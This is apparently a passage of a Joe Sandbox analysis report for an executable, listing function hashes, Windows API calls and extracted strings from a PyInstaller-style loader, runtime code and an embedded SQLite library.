                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8351D926618BA186D634BF26E4581BAB7A1F798B61F004135EFDE83798DF3CD045DB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction ID: 53fbc21aa26a1c8baebb89bf1b785cb32d0e9083d5ce3d1d857dcd68926cce1a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76216221B0CE46CAEA41BB7AACD61796290FF88F90F584231DE1DC339CDE2CD5918211
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194820535.00007FFDF8551000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF8550000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194771737.00007FFDF8550000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF85FE000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8602000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8607000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF865F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8664000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194820535.00007FFDF8667000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195351397.00007FFDF8668000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2195399422.00007FFDF8669000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdf8550000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                • Opcode ID: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                • Instruction ID: 93f26723bcc86e7a976eefd9349515c92706fb962fbd43825c6310ca93882c5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc53fe8a0eda1481b36a314380ac74b5aff62c5ee69524d86cd6bd6c99e3d1c0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C381DF21F1C34347FB669B669C70A792291AF41788F448039D92D4F7DEDE3CE845A70A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction ID: 00d9f1a30a038057ea36a85810fac9fbb01438922ab9e1257e04274049b1e1a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF129571E0C2878AFB20BF14D1966797691FB50750F884935EE8DA66CCDF3CE9809B10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction ID: 1710dfed5af7060dc4ace23094578b604852e3ed78ce30615364b073edafc303
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF128672E1C1438AFB24BE14E0966B9B6A1FB40755F944135DEDAC6ACCDF7CE8809B10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                                • API String ID: 1405196051-2846519077
                                                                                                                                                                                                                                • Opcode ID: 3f3202799f0cd881bb3f695ed7ac0f0e3980f2b58005d14470d5ddecbe64b2ab
                                                                                                                                                                                                                                • Instruction ID: 6d1eb0bac1cf792629891405347c708d2801b7278da2d759b79d8097ddc5c68b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f3202799f0cd881bb3f695ed7ac0f0e3980f2b58005d14470d5ddecbe64b2ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C702C161B0879286EB28DB219420BB93790FF95BD4F0482B5EE6D4B7D9DF3CE5818700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: new[]
                                                                                                                                                                                                                                • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                                                                                • API String ID: 4059295235-3840279414
                                                                                                                                                                                                                                • Opcode ID: 95529dcaa0ae4f9f9b80e21f1a4713639f067412f55fc70f80a129abc63d2c98
                                                                                                                                                                                                                                • Instruction ID: fb27c8e67db8bd4f1c5f430da4590541e187aefbe8c36b78051973b0a127961a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 95529dcaa0ae4f9f9b80e21f1a4713639f067412f55fc70f80a129abc63d2c98
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E51F521F4C28741FB29BB619475EBA6691AF85B88F0940B2DD6F037DECE3DE8458300
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
                                                                                                                                                                                                                                • Instruction ID: 7459360ec29d47892f7ca7b3f226f9c7bfae7500f501a5feadf30b27caba8821
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f0021a5e06caa1d5927e7faba78de093a7e02f73eeda03f06a6a07f76cf53df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB416F22B1C6528AEA10FB51AC926B96390FF85BC4F544432ED4C8BB9FDE3CE5058740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(?,?,00000000,00007FF644873CBB), ref: 00007FF644878704
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487870A
                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00007FF644873CBB), ref: 00007FF64487874C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878830: GetEnvironmentVariableW.KERNEL32(00007FF64487388E), ref: 00007FF644878867
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644878830: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF644878889
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644888238: _invalid_parameter_noinfo.LIBCMT ref: 00007FF644888251
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644872810: MessageBoxW.USER32 ref: 00007FF6448728EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                                • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                                • Opcode ID: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                                • Instruction ID: 40fb5a91a1e8ec0f6027071174944447d2761233b90d69bca2c88638ece993cd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 881e4fca8e19ec4ab2ebb52834f4ac375ff8f2bae867f31c8bf391ae1f14406c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE416E21B1DA468CFA20F766A9E72B91291AF85BC0F804135ED0ED77DEEE3CE5018300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$misuse
                                                                                                                                                                                                                                • API String ID: 1405196051-1404302391
                                                                                                                                                                                                                                • Opcode ID: bca8e14166ac8076eb2c5bfb264f1e696af0ae6fbc3cd14c769c7679af632c56
                                                                                                                                                                                                                                • Instruction ID: f9f283fd72665895b1167758e3ba68eba8052b8c4f47ccd9517f980a7d9bd316
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bca8e14166ac8076eb2c5bfb264f1e696af0ae6fbc3cd14c769c7679af632c56
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4F18D21B0AB4281FB68AF15A4A4B7933A4BF41B84F494175DE6E477E9CF3DE8819300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction ID: f8330fd1725a1a2278a1144c19ed880de9d01afa05512aeb3700ab5d900907b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86D15E22A0C7418AFB60FB6598923BDBBA0FB55788F104535DE4D97B9ADF38E491C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF64488F0AA,?,?,00000281A9BE9748,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE8C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF64488F0AA,?,?,00000281A9BE9748,00007FF64488AD53,?,?,?,00007FF64488AC4A,?,?,?,00007FF644885F3E), ref: 00007FF64488EE98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction ID: 4861471d91912b6eac5c630d5e78980341220ec49ac5bb6e81186349b14b345c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8941CF61B1DA1289FA16FB16AC926752391FF49BA0F884539DD1DD778CEF3CE8498300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF644872D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2194518215.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194471815.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194573290.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194629316.00007FF6448B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2194725586.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction ID: 9403c8673401f80a69e7cffd16a5ecb000d3d4a53e4aec06535fd581193eb089
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731E82270CB4146E720BB25B8916AA6691BFC8B98F414136EF4DD3B5DEF3CD506C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • 00007FFE148D2010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDFAF4D1A0), ref: 00007FFDFAF0911D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.2196754681.00007FFDFAED1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FFDFAED0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196705748.00007FFDFAED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB032000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB034000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2196754681.00007FFDFB049000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197064707.00007FFDFB04B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.2197118312.00007FFDFB04C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffdfaed0000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: 00007D2010E148
                                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
                                                                                                                                                                                                                                • API String ID: 1405196051-3538577999
                                                                                                                                                                                                                                • Opcode ID: c885a5a5644e3b07b7de876bd5e90a4aa787cbbbd2c3cc1aaf0c08ab861a816c
                                                                                                                                                                                                                                • Instruction ID: 408d8c0053b19d15d7845e63cc83e5d6a7f67cdd389b13cd77eba81672bd4d60
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c885a5a5644e3b07b7de876bd5e90a4aa787cbbbd2c3cc1aaf0c08ab861a816c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E51D425B0E66281FB189B619470A786391AF41BA0F4C82B1EE7D4F7DDEE3DE4418340
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD4D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD5B
